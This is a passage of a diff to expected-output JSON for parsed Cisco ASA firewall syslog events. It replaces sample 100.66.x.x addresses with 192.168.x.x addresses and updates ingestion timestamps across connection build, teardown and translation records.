localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363288600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -1367,8 +1367,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1403,7 +1403,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1414,8 +1414,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111583241Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363293800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1452,8 +1452,8 @@ }, "source": { "port": 80, - "address": "100.66.209.247", - "ip": "100.66.209.247" + "address": "192.168.209.247", + "ip": "192.168.209.247" }, "tags": [ "preserve_original_event" @@ -1488,7 +1488,7 @@ "localhost" ], "ip": [ - "100.66.209.247", + "192.168.209.247", "172.31.98.44" ] }, @@ -1499,8 +1499,8 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:02.111584913Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "ingested": "2021-12-09T13:31:36.363299700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:45.000Z", @@ -1537,8 +1537,8 @@ }, "source": { "port": 80, - "address": "100.66.35.162", - "ip": "100.66.35.162" + "address": "192.168.35.162", + "ip": "192.168.35.162" }, "tags": [ "preserve_original_event" @@ -1573,7 +1573,7 @@ "localhost" ], "ip": [ - "100.66.35.162", + "192.168.35.162", "172.31.98.44" ] }, @@ -1584,8 +1584,8 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-07-19T09:06:02.111586589Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "ingested": "2021-12-09T13:31:36.363337100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:26.000Z", @@ -1617,8 +1617,8 @@ }, "destination": { "port": 1188, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -1658,7 +1658,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -1666,8 +1666,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111588192Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188", + "ingested": "2021-12-09T13:31:36.363344400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1700,8 +1700,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1736,7 +1736,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1745,8 +1745,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111589869Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363350400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1762,7 +1762,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.80.32", + "mapped_source_ip": "192.168.80.32", "connection_id": "11758", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1784,8 +1784,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1820,7 +1820,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1830,8 +1830,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111591537Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", + "ingested": "2021-12-09T13:31:36.363356400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -1868,8 +1868,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1904,7 +1904,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1913,8 +1913,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111593139Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363361Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1930,7 +1930,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.6", + "mapped_source_ip": "192.168.252.6", "connection_id": "11759", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1952,8 +1952,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1988,7 +1988,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1998,8 +1998,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111594912Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", + "ingested": "2021-12-09T13:31:36.363365200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2031,8 +2031,8 @@ }, "destination": { "port": 8257, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1773, @@ -2072,7 +2072,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2080,8 +2080,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111596585Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257", + "ingested": "2021-12-09T13:31:36.363369600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2114,8 +2114,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2150,7 +2150,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2159,8 +2159,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111598241Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", + "ingested": "2021-12-09T13:31:36.363373300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2176,7 +2176,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11760", "source_interface": "outside", "mapped_destination_port": 1773 @@ -2193,8 +2193,8 @@ }, "destination": { "port": 8258, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1774, @@ -2234,7 +2234,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2242,8 +2242,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111599873Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258", + "ingested": "2021-12-09T13:31:36.363377600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2276,8 +2276,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2312,7 +2312,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2321,8 +2321,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111601536Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", + "ingested": "2021-12-09T13:31:36.363381600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2338,7 +2338,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11761", "source_interface": "outside", "mapped_destination_port": 1774 @@ -2360,8 +2360,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2396,7 +2396,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2405,8 +2405,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111603181Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363385800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2422,7 +2422,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.238.126", + "mapped_source_ip": "192.168.238.126", "connection_id": "11762", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2444,8 +2444,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2480,7 +2480,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2489,8 +2489,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111604859Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363389800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2506,7 +2506,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.93.51", + "mapped_source_ip": "192.168.93.51", "connection_id": "11763", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2528,8 +2528,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2564,7 +2564,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2574,8 +2574,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111606551Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", + "ingested": "2021-12-09T13:31:36.363394100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2612,8 +2612,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2648,7 +2648,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2658,8 +2658,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111613702Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", + "ingested": "2021-12-09T13:31:36.363398400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2691,8 +2691,8 @@ }, "destination": { "port": 8259, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1775, @@ -2732,7 +2732,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2740,8 +2740,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111615442Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259", + "ingested": "2021-12-09T13:31:36.363403Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2774,8 +2774,8 @@ }, "source": { "port": 443, - "address": "100.66.225.103", - "ip": "100.66.225.103" + "address": "192.168.225.103", + "ip": "192.168.225.103" }, "tags": [ "preserve_original_event" @@ -2810,7 +2810,7 @@ "localhost" ], "ip": [ - "100.66.225.103", + "192.168.225.103", "172.31.98.44" ] }, @@ -2819,8 +2819,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111617090Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", + "ingested": "2021-12-09T13:31:36.363406900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2836,7 +2836,7 @@ "destination_interface": "inside", "mapped_source_port": 443, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.225.103", + "mapped_source_ip": "192.168.225.103", "connection_id": "11764", "source_interface": "outside", "mapped_destination_port": 1775 @@ -2853,8 +2853,8 @@ }, "destination": { "port": 1189, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -2894,7 +2894,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2902,8 +2902,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111618941Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189", + "ingested": "2021-12-09T13:31:36.363410500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2936,8 +2936,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -2972,7 +2972,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -2981,8 +2981,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111620598Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363414600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2998,7 +2998,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.240.126", + "mapped_source_ip": "192.168.240.126", "connection_id": "11772", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3020,8 +3020,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3056,7 +3056,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3065,8 +3065,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111622286Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363419500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3082,7 +3082,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.44.45", + "mapped_source_ip": "192.168.44.45", "connection_id": "11773", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3104,8 +3104,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -3140,7 +3140,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -3150,8 +3150,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111623941Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", + "ingested": "2021-12-09T13:31:36.363424600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3188,8 +3188,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3224,7 +3224,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3234,8 +3234,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111625568Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", + "ingested": "2021-12-09T13:31:36.363429100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3267,8 +3267,8 @@ }, "destination": { "port": 8265, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1452, @@ -3308,7 +3308,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3316,8 +3316,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111627193Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265", + "ingested": "2021-12-09T13:31:36.363433500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3350,8 +3350,8 @@ }, "source": { "port": 80, - "address": "100.66.179.219", - "ip": "100.66.179.219" + "address": "192.168.179.219", + "ip": "192.168.179.219" }, "tags": [ "preserve_original_event" @@ -3386,7 +3386,7 @@ "localhost" ], "ip": [ - "100.66.179.219", + "192.168.179.219", "172.31.98.44" ] }, @@ -3395,8 +3395,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111628893Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", + "ingested": "2021-12-09T13:31:36.363438Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3412,7 +3412,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.219", + "mapped_source_ip": "192.168.179.219", "connection_id": "11774", "source_interface": "outside", "mapped_destination_port": 1452 @@ -3434,8 +3434,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3470,7 +3470,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3479,8 +3479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111630499Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363442900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3496,7 +3496,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.157.232", + "mapped_source_ip": "192.168.157.232", "connection_id": "11775", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3518,8 +3518,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3554,7 +3554,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3563,8 +3563,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111632137Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363447Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3580,7 +3580,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.178.133", + "mapped_source_ip": "192.168.178.133", "connection_id": "11776", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3602,8 +3602,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ 